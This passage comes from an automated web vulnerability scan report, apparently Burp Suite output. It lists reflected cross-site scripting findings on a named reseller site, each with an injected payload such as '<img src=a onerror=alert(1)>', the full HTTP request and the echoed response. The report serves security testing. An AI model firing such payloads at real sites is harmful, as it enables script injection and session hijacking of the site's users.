<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/reviewf2129<img src=a onerror=alert(1)>e20cd9f539b/5.gif]</td>
...[SNIP]...

2.4567. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload f3bea</title><img%20src%3da%20onerror%3dalert(1)>9ed86bddc77 was submitted in the REST URL parameter 5. This input was echoed as f3bea</title><img src=a onerror=alert(1)>9ed86bddc77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/reviewf3bea</title><img%20src%3da%20onerror%3dalert(1)>9ed86bddc77/5.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/reviewf3bea</title><img src=a onerror=alert(1)>9ed86bddc77/5.gif</title>
...[SNIP]...

2.4568. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b1c04<img%20src%3da%20onerror%3dalert(1)>389530f5220 was submitted in the REST URL parameter 6. This input was echoed as b1c04<img src=a onerror=alert(1)>389530f5220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/5.gifb1c04<img%20src%3da%20onerror%3dalert(1)>389530f5220 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:54:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/review/5.gifb1c04<img src=a onerror=alert(1)>389530f5220]</td>
...[SNIP]...

2.4569. http://www.resellerbase.com/tag/themes/kosmos/images/review/5.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/5.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as text between TITLE tags. The payload b9230</title><img%20src%3da%20onerror%3dalert(1)>1225ab9fdea was submitted in the REST URL parameter 6. This input was echoed as b9230</title><img src=a onerror=alert(1)>1225ab9fdea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/review/5.gifb9230</title><img%20src%3da%20onerror%3dalert(1)>1225ab9fdea HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:55:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/review/5.gifb9230</title><img src=a onerror=alert(1)>1225ab9fdea</title>
...[SNIP]...

2.4570. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8b488<script>alert(1)</script>d4885683d8b4fdd99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag8b488<script>alert(1)</script>d4885683d8b4fdd99/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:03:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8b488<script>alert(1)</script>d4885683d8b4fdd99/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4571. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ce9a3<script>alert(1)</script>4ecfc3600c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagce9a3<script>alert(1)</script>4ecfc3600c6/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:01:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagce9a3<script>alert(1)</script>4ecfc3600c6/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4572. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e933f<img%20src%3da%20onerror%3dalert(1)>80fbf6004dd511993 was submitted in the REST URL parameter 2. This input was echoed as e933f<img src=a onerror=alert(1)>80fbf6004dd511993 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themese933f<img%20src%3da%20onerror%3dalert(1)>80fbf6004dd511993/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themese933f<img src=a onerror=alert(1)>80fbf6004dd511993/kosmos/images/review/search.php]</td>
...[SNIP]...

2.4573. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b59cf<img%20src%3da%20onerror%3dalert(1)>21f23ce198b was submitted in the REST URL parameter 2. This input was echoed as b59cf<img src=a onerror=alert(1)>21f23ce198b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themesb59cf<img%20src%3da%20onerror%3dalert(1)>21f23ce198b/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themesb59cf<img src=a onerror=alert(1)>21f23ce198b/kosmos/images/review/search.php]</td>
...[SNIP]...

2.4574. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e5989</title><img%20src%3da%20onerror%3dalert(1)>89752615df7 was submitted in the REST URL parameter 2. This input was echoed as e5989</title><img src=a onerror=alert(1)>89752615df7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themese5989</title><img%20src%3da%20onerror%3dalert(1)>89752615df7/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themese5989</title><img src=a onerror=alert(1)>89752615df7/kosmos/images/review/search.php</title>
...[SNIP]...

2.4575. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 3b4d2</title><img%20src%3da%20onerror%3dalert(1)>48eeb94e6eb5bf160 was submitted in the REST URL parameter 2. This input was echoed as 3b4d2</title><img src=a onerror=alert(1)>48eeb94e6eb5bf160 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes3b4d2</title><img%20src%3da%20onerror%3dalert(1)>48eeb94e6eb5bf160/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes3b4d2</title><img src=a onerror=alert(1)>48eeb94e6eb5bf160/kosmos/images/review/search.php</title>
...[SNIP]...

2.4576. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload df3f5<img%20src%3da%20onerror%3dalert(1)>263bd0f6d5cbbfbb4 was submitted in the REST URL parameter 3. This input was echoed as df3f5<img src=a onerror=alert(1)>263bd0f6d5cbbfbb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmosdf3f5<img%20src%3da%20onerror%3dalert(1)>263bd0f6d5cbbfbb4/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmosdf3f5<img src=a onerror=alert(1)>263bd0f6d5cbbfbb4/images/review/search.php]</td>
...[SNIP]...

2.4577. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload bfbb5</title><img%20src%3da%20onerror%3dalert(1)>1d7e05af986 was submitted in the REST URL parameter 3. This input was echoed as bfbb5</title><img src=a onerror=alert(1)>1d7e05af986 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmosbfbb5</title><img%20src%3da%20onerror%3dalert(1)>1d7e05af986/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmosbfbb5</title><img src=a onerror=alert(1)>1d7e05af986/images/review/search.php</title>
...[SNIP]...

2.4578. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1f0c8<img%20src%3da%20onerror%3dalert(1)>808daee7634 was submitted in the REST URL parameter 3. This input was echoed as 1f0c8<img src=a onerror=alert(1)>808daee7634 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos1f0c8<img%20src%3da%20onerror%3dalert(1)>808daee7634/images/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos1f0c8<img src=a onerror=alert(1)>808daee7634/images/review/search.php]</td>
...[SNIP]...

2.4579. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 7c508</title><img%20src%3da%20onerror%3dalert(1)>423306722d371e94d was submitted in the REST URL parameter 3. This input was echoed as 7c508</title><img src=a onerror=alert(1)>423306722d371e94d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos7c508</title><img%20src%3da%20onerror%3dalert(1)>423306722d371e94d/images/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos7c508</title><img src=a onerror=alert(1)>423306722d371e94d/images/review/search.php</title>
...[SNIP]...

2.4580. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload ea2de</title><img%20src%3da%20onerror%3dalert(1)>d73109bd734cefa72 was submitted in the REST URL parameter 4. This input was echoed as ea2de</title><img src=a onerror=alert(1)>d73109bd734cefa72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/imagesea2de</title><img%20src%3da%20onerror%3dalert(1)>d73109bd734cefa72/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/imagesea2de</title><img src=a onerror=alert(1)>d73109bd734cefa72/review/search.php</title>
...[SNIP]...

2.4581. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9cd79<img%20src%3da%20onerror%3dalert(1)>017ff7f2ea8 was submitted in the REST URL parameter 4. This input was echoed as 9cd79<img src=a onerror=alert(1)>017ff7f2ea8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images9cd79<img%20src%3da%20onerror%3dalert(1)>017ff7f2ea8/review/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images9cd79<img src=a onerror=alert(1)>017ff7f2ea8/review/search.php]</td>
...[SNIP]...

2.4582. http://www.resellerbase.com/tag/themes/kosmos/images/review/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/review/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bd209<img%20src%3da%20onerror%3dalert(1)>4b95d2754a3459867 was submitted in the REST URL parameter 4. This input was echoed as bd209<img src=a onerror=alert(1)>4b95d2754a3459867 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/imagesbd209<img%20src%3da%20onerror%3dalert(1)>4b95d2754a3459867/review/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
